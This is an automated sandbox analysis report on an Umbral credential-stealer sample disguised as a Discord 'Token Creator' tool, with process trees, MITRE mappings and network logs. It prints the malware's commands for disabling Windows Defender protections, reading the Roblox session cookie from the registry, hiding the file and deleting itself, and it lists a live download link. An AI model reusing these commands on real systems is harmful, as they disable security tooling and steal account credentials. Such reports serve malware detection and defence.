umbral | hxxps://mega[.]nz/file/ozNUBJZL#mcAL8HwC43sbtHfcKYR6voJ_N1j6YumoUor-GmmuPqA

Analysis

max time kernel
36s
max time network
33s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
25/12/2024, 10:53 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/ozNUBJZL#mcAL8HwC43sbtHfcKYR6voJ_N1j6YumoUor-GmmuPqA

Score

10^/10

umbral discovery execution stealer

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/5228-196-0x000001D969230000-0x000001D969270000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5572	powershell.exe
5732	powershell.exe
5932	powershell.exe
5584	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Token Creator.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
63	discord.com
64	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
55	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5772	cmd.exe
5764	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5748	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5764	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
5092	msedge.exe
5092	msedge.exe
2072	msedge.exe
2072	msedge.exe
2132	identity_helper.exe
2132	identity_helper.exe
3732	msedge.exe
3732	msedge.exe
5228	Token Creator.exe
5228	Token Creator.exe
5572	powershell.exe
5572	powershell.exe
5572	powershell.exe
5732	powershell.exe
5732	powershell.exe
5732	powershell.exe
5932	powershell.exe
5932	powershell.exe
5932	powershell.exe
6128	powershell.exe
6128	powershell.exe
6128	powershell.exe
5584	powershell.exe
5584	powershell.exe
5584	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs

pid	Process
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	1872	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1872	AUDIODG.EXE
Token: SeDebugPrivilege	5228	Token Creator.exe
Token: SeIncreaseQuotaPrivilege	5448	wmic.exe
Token: SeSecurityPrivilege	5448	wmic.exe
Token: SeTakeOwnershipPrivilege	5448	wmic.exe
Token: SeLoadDriverPrivilege	5448	wmic.exe
Token: SeSystemProfilePrivilege	5448	wmic.exe
Token: SeSystemtimePrivilege	5448	wmic.exe
Token: SeProfSingleProcessPrivilege	5448	wmic.exe
Token: SeIncBasePriorityPrivilege	5448	wmic.exe
Token: SeCreatePagefilePrivilege	5448	wmic.exe
Token: SeBackupPrivilege	5448	wmic.exe
Token: SeRestorePrivilege	5448	wmic.exe
Token: SeShutdownPrivilege	5448	wmic.exe
Token: SeDebugPrivilege	5448	wmic.exe
Token: SeSystemEnvironmentPrivilege	5448	wmic.exe
Token: SeRemoteShutdownPrivilege	5448	wmic.exe
Token: SeUndockPrivilege	5448	wmic.exe
Token: SeManageVolumePrivilege	5448	wmic.exe
Token: 33	5448	wmic.exe
Token: 34	5448	wmic.exe
Token: 35	5448	wmic.exe
Token: 36	5448	wmic.exe
Token: SeIncreaseQuotaPrivilege	5448	wmic.exe
Token: SeSecurityPrivilege	5448	wmic.exe
Token: SeTakeOwnershipPrivilege	5448	wmic.exe
Token: SeLoadDriverPrivilege	5448	wmic.exe
Token: SeSystemProfilePrivilege	5448	wmic.exe
Token: SeSystemtimePrivilege	5448	wmic.exe
Token: SeProfSingleProcessPrivilege	5448	wmic.exe
Token: SeIncBasePriorityPrivilege	5448	wmic.exe
Token: SeCreatePagefilePrivilege	5448	wmic.exe
Token: SeBackupPrivilege	5448	wmic.exe
Token: SeRestorePrivilege	5448	wmic.exe
Token: SeShutdownPrivilege	5448	wmic.exe
Token: SeDebugPrivilege	5448	wmic.exe
Token: SeSystemEnvironmentPrivilege	5448	wmic.exe
Token: SeRemoteShutdownPrivilege	5448	wmic.exe
Token: SeUndockPrivilege	5448	wmic.exe
Token: SeManageVolumePrivilege	5448	wmic.exe
Token: 33	5448	wmic.exe
Token: 34	5448	wmic.exe
Token: 35	5448	wmic.exe
Token: 36	5448	wmic.exe
Token: SeDebugPrivilege	5572	powershell.exe
Token: SeDebugPrivilege	5732	powershell.exe
Token: SeDebugPrivilege	5932	powershell.exe
Token: SeDebugPrivilege	6128	powershell.exe
Token: SeIncreaseQuotaPrivilege	2484	wmic.exe
Token: SeSecurityPrivilege	2484	wmic.exe
Token: SeTakeOwnershipPrivilege	2484	wmic.exe
Token: SeLoadDriverPrivilege	2484	wmic.exe
Token: SeSystemProfilePrivilege	2484	wmic.exe
Token: SeSystemtimePrivilege	2484	wmic.exe
Token: SeProfSingleProcessPrivilege	2484	wmic.exe
Token: SeIncBasePriorityPrivilege	2484	wmic.exe
Token: SeCreatePagefilePrivilege	2484	wmic.exe
Token: SeBackupPrivilege	2484	wmic.exe
Token: SeRestorePrivilege	2484	wmic.exe
Token: SeShutdownPrivilege	2484	wmic.exe
Token: SeDebugPrivilege	2484	wmic.exe
Token: SeSystemEnvironmentPrivilege	2484	wmic.exe
Token: SeRemoteShutdownPrivilege	2484	wmic.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe
2072	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2072 wrote to memory of 540	2072	msedge.exe	83
PID 2072 wrote to memory of 540	2072	msedge.exe	83
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 1868	2072	msedge.exe	84
PID 2072 wrote to memory of 5092	2072	msedge.exe	85
PID 2072 wrote to memory of 5092	2072	msedge.exe	85
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86
PID 2072 wrote to memory of 1296	2072	msedge.exe	86

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5524	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://mega.nz/file/ozNUBJZL#mcAL8HwC43sbtHfcKYR6voJ_N1j6YumoUor-GmmuPqA
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff997246f8,0x7fff99724708,0x7fff99724718
  2⤵
  PID:540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:1296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:3196
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  PID:936
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5704 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:1524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  PID:3180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:4296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5996 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13516271047731045247,181986282389431991,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6184 /prefetch:1
  2⤵
  PID:5968

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2364

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x4e8
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1388

C:\Users\Admin\Downloads\Token Creator Discord\Token Creator Discord\Token Creator.exe
"C:\Users\Admin\Downloads\Token Creator Discord\Token Creator Discord\Token Creator.exe"
1⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5448
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Token Creator Discord\Token Creator Discord\Token Creator.exe"
  2⤵
  - Views/modifies file attributes
  PID:5524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Token Creator Discord\Token Creator Discord\Token Creator.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5572
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5932
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:6128
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2484
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:5360
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5584
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:5748
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Token Creator Discord\Token Creator Discord\Token Creator.exe" && pause
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5772
- - C:\Windows\system32\PING.EXE
    ping localhost
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:5764

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

mega.nz

msedge.exe

Remote address:

8.8.8.8:53

Request

mega.nz

IN A

Response

mega.nz

IN A

31.216.145.5

mega.nz

IN A

31.216.144.5
GET

https://mega.nz/file/ozNUBJZL

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /file/ozNUBJZL HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/html
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
Content-Length: 859
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
X-Frame-Options: DENY
X-Robots-Tag: noindex
Set-Cookie: geoip=GB
Content-Security-Policy: default-src 'self' data: blob: *.mega.co.nz *.mega.nz *.mega.io http://*.mega.co.nz http://*.mega.nz http://*.mega.io wss://*.karere.mega.nz wss://*.sfu.mega.co.nz *.karere.mega.nz:1380 http://127.0.0.1:6341 localhost.megasyncloopback.mega.nz:6342; script-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob:; style-src 'self' 'unsafe-inline' *.mega.co.nz *.mega.nz *.mega.io data: blob:; frame-src 'self' *.megapay.nz ad.mega.nz mega: *.megaad.nz https://mega.nz/ https://mega.io/; img-src 'self' *.mega.co.nz *.mega.nz *.mega.io data: blob: mega.nz
Connection: Keep-Alive
GET

https://mega.nz/secureboot.js?r=1734569151

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /secureboot.js?r=1734569151 HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 58368
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
GET

https://mega.nz/loading-sprite_light.png

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /loading-sprite_light.png HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 2883
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
GET

https://mega.nz/favicon.ico?v=3

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /favicon.ico?v=3 HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: image/x-icon
Content-Length: 1029
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Content-Encoding: gzip
GET

https://mega.nz/android-chrome-144x144.png

msedge.exe

Remote address:

31.216.145.5:443

Request

GET /android-chrome-144x144.png HTTP/1.1
Host: mega.nz
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://mega.nz/file/ozNUBJZL
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: image/png
Content-Length: 7057
Cache-Control: max-age=8640000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
GET

https://mega.nz/sw.js?v=1

msedge.exe

Remote address:

31.216.145.5:443

Request

